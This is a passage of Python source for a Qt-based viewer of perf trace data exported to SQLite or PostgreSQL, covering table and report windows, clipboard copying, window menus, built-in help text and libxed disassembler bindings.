self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
if '"' in val:
val = val.replace('"', '""')
if "," in val or '"' in val:
val = '"' + val + '"'
return val
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000
def RowColumnKey(a):
return a.row() * glb_max_cols + a.column()
# Copy selected table cells to clipboard
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
idx_cnt = len(indexes)
if not idx_cnt:
return
if idx_cnt == 1:
with_hdr=False
min_row = indexes[0].row()
max_row = indexes[0].row()
min_col = indexes[0].column()
max_col = indexes[0].column()
for i in indexes:
min_row = min(min_row, i.row())
max_row = max(max_row, i.row())
min_col = min(min_col, i.column())
max_col = max(max_col, i.column())
if max_col > glb_max_cols:
raise RuntimeError("glb_max_cols is too low")
max_width = [0] * (1 + max_col - min_col)
for i in indexes:
c = i.column() - min_col
max_width[c] = max(max_width[c], len(str(i.data())))
text = ""
pad = ""
sep = ""
if with_hdr:
model = indexes[0].model()
for col in range(min_col, max_col + 1):
val = model.headerData(col, Qt.Horizontal, Qt.DisplayRole)
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
c = col - min_col
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
last_row = min_row
for i in indexes:
if i.row() > last_row:
last_row = i.row()
text += "\n"
pad = ""
sep = ""
if as_csv:
text += sep + ToCSValue(str(i.data()))
sep = ","
else:
width = max_width[i.column() - min_col]
if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = str(i.data()).rjust(width)
else:
val = str(i.data())
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = view.selectedIndexes()
if not len(indexes):
return
selection = view.selectionModel()
first = None
for i in indexes:
above = view.indexAbove(i)
if not selection.isSelected(above):
first = i
break
if first is None:
raise RuntimeError("CopyTreeCellsToClipboard internal error")
model = first.model()
row_cnt = 0
col_cnt = model.columnCount(first)
max_width = [0] * col_cnt
indent_sz = 2
indent_str = " " * indent_sz
expanded_mark_sz = 2
if sys.version_info[0] == 3:
expanded_mark = "\u25BC "
not_expanded_mark = "\u25B6 "
else:
expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
leaf_mark = " "
if not as_csv:
pos = first
while True:
row_cnt += 1
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
if c:
n = len(str(i.data()))
else:
n = len(str(i.data()).strip())
n += (i.internalPointer().level - 1) * indent_sz
n += expanded_mark_sz
max_width[c] = max(max_width[c], n)
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = ""
pad = ""
sep = ""
if with_hdr:
for c in range(col_cnt):
val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
pos = first
while True:
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
val = str(i.data())
if not c:
if model.hasChildren(i):
if view.isExpanded(i):
mark = expanded_mark
else:
mark = not_expanded_mark
else:
mark = leaf_mark
val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
width = max_width[c]
if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = text.rstrip() + "\n"
pad = ""
sep = ""
QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
view.CopyCellsToClipboard(view, as_csv, with_hdr)
def CopyCellsToClipboardHdr(view):
CopyCellsToClipboard(view, False, True)
def CopyCellsToClipboardCSV(view):
CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
def __init__(self, view):
self.view = view
self.view.setContextMenuPolicy(Qt.CustomContextMenu)
self.view.customContextMenuRequested.connect(self.ShowContextMenu)
def ShowContextMenu(self, pos):
menu = QMenu(self.view)
self.AddActions(menu)
menu.exec_(self.view.mapToGlobal(pos))
def AddCopy(self, menu):
menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))
def AddActions(self, menu):
self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
def __init__(self, view):
super(TreeContextMenu, self).__init__(view)
def AddActions(self, menu):
i = self.view.currentIndex()
text = str(i.data()).strip()
if len(text):
menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.ResizeColumnsToContents()
self.context_menu = ContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.context_menu = ContextMenu(self.view)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda a=None,x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#charts>2. Charts</a></p>
<p class=c2><a href=#timechartbycpu>2.1 Time chart by CPU</a></p>
<p class=c1><a href=#tables>3. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would be always 1, is replaced by the 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Instructions per Cycle (IPC)</h3>
If available, IPC information is displayed in columns 'insn_cnt', 'cyc_cnt' and 'IPC'.
<p><b>Intel PT note:</b> The information applies to the blocks of code ending with, and including, that branch.
Due to the granularity of timing information, the number of cycles for some code blocks will not be known.
In that case, 'insn_cnt', 'cyc_cnt' and 'IPC' are zero, but when 'IPC' is displayed it covers the period
since the previous displayed 'IPC'.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=charts>2. Charts</h1>
<h2 id=timechartbycpu>2.1 Time chart by CPU</h2>
This chart displays context switch information when that data is available. Refer to context_switches_view on the Tables menu.
<h3>Features</h3>
<ol>
<li>Mouse over to highight the task and show the time</li>
<li>Drag the mouse to select a region and zoom by pushing the Zoom button</li>
<li>Go back and forward by pressing the arrow buttons</li>
<li>If call information is available, right-click to show a call tree opened to that task and time.
Note, the call tree may take some time to appear, and there may not be call information for the task or time selected.
</li>
</ol>
<h3>Important</h3>
The graph can be misleading in the following respects:
<ol>
<li>The graph shows the first task on each CPU as running from the beginning of the time range.
Because tracing might start on different CPUs at different times, that is not necessarily the case.
Refer to context_switches_view on the Tables menu to understand what data the graph is based upon.</li>
<li>Similarly, the last task on each CPU can be showing running longer than it really was.
Again, refer to context_switches_view on the Tables menu to understand what data the graph is based upon.</li>
<li>When the mouse is over a task, the highlighted task might not be visible on the legend without scrolling if the legend does not fit fully in the window</li>
</ol>
<h1 id=tables>3. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# PostqreSQL server version
def PostqreSQLServerVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT VERSION()")
if query.next():
v_str = query.value(0)
v_list = v_str.strip().split(" ")
if v_list[0] == "PostgreSQL" and v_list[2] == "on":
return v_list[1]
return v_str
return "Unknown"
# SQLite version
def SQLiteVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT sqlite_version()")
if query.next():
return query.value(0)
return "Unknown"
# About dialog
class AboutDialog(QDialog):
def __init__(self, glb, parent=None):
super(AboutDialog, self).__init__(parent)
self.setWindowTitle("About Exported SQL Viewer")
self.setMinimumWidth(300)
pyside_version = "1" if pyside_version_1 else "2"
text = "<pre>"
text += "Python version: " + sys.version.split(" ")[0] + "\n"
text += "PySide version: " + pyside_version + "\n"
text += "Qt version: " + qVersion() + "\n"
if glb.dbref.is_sqlite3:
text += "SQLite version: " + SQLiteVersion(glb.db) + "\n"
else:
text += "PostqreSQL version: " + PostqreSQLServerVersion(glb.db) + "\n"
text += "</pre>"
self.text = QTextBrowser()
self.text.setHtml(text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.text)
self.setLayout(self.vbox)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
if IsSelectable(glb.db, "context_switches"):
charts_menu = menu.addMenu("&Charts")
charts_menu.addAction(CreateAction("&Time chart by CPU", "Create a new window displaying time charts by CPU", self.TimeChartByCPU, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))
def Try(self, fn):
win = self.mdi_area.activeSubWindow()
if win:
try:
fn(win.view)
except:
pass
def CopyToClipboard(self):
self.Try(CopyCellsToClipboardHdr)
def CopyToClipboardCSV(self):
self.Try(CopyCellsToClipboardCSV)
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
self.Try(ShrinkFont)
def EnlargeFont(self):
self.Try(EnlargeFont)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewSelectedBranchView(x), self))
def TimeChartByCPU(self):
TimeChartByCPUWindow(self.glb, self)
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None,t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
def About(self):
dialog = AboutDialog(self.glb, self)
dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
